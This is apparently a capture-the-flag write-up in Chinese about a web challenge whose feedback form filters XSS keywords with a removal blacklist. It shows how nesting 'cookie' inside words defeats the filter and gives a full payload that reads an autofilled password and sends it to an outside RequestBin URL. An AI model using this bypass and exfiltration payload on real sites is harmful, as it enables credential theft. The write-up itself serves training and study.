题目:
image.png
image.png
image.png
三个界面,注册界面源代码毛都没有,登录界面源代码里面有东西
if (document.cookie && document.cookie != '') {
var cookies = document.cookie.split('; ');
var cookie = {};
for (var i = 0; i < cookies.length; i++) {
var arr = cookies[i].split('=');
var key = arr[0];
cookie[key] = arr[1];
}
if(typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined"){
document.getElementsByName("username")[0].value = cookie['user'];
document.getElementsByName("password")[0].value = cookie['psw'];
}
}
意思很明确,就是用户名和密码都写入了表单
下面我们注册一下
登录进去之后,出现feedback界面
image.png
点进去看一下
image.png
发现源码里有文章
if(is_array($feedback)){
echo "<script>alert('反馈不合法');</script>";
return false;
}
$blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onload','onerror','srcdoc','location','svg','form','img','src','getElement','document','cookie'];
foreach ($blacklist as $val) {
while(true){
if(stripos($feedback,$val) !== false){
$feedback = str_ireplace($val,"",$feedback);
}else{
break;
}
}
}
显而易见给过滤了不少东西,由于我们已经知道login.js有记录密码的功能。
这时候就要介绍我们的http://http.requestbin.buuoj.cn
网址,(RequestBin提供了一个URL,该URL将收集对其发出的请求,首页点击create a requestbin)
构造POC就很简单了
<incookieput type="text" name="username">
<incookieput type="password" name="password">
<scrcookieipt scookierc="./js/login.js"></scrcookieipt>
<scrcookieipt>
var psw = docucookiement.getcookieElementsByName("password")[0].value;
docucookiement.locacookietion="http://http.requestbin.buuoj.cn/y6b4uwy6/?a="+psw;
</scrcookieipt>
提交成功之后去BIN里面看一下
image.png
image.png
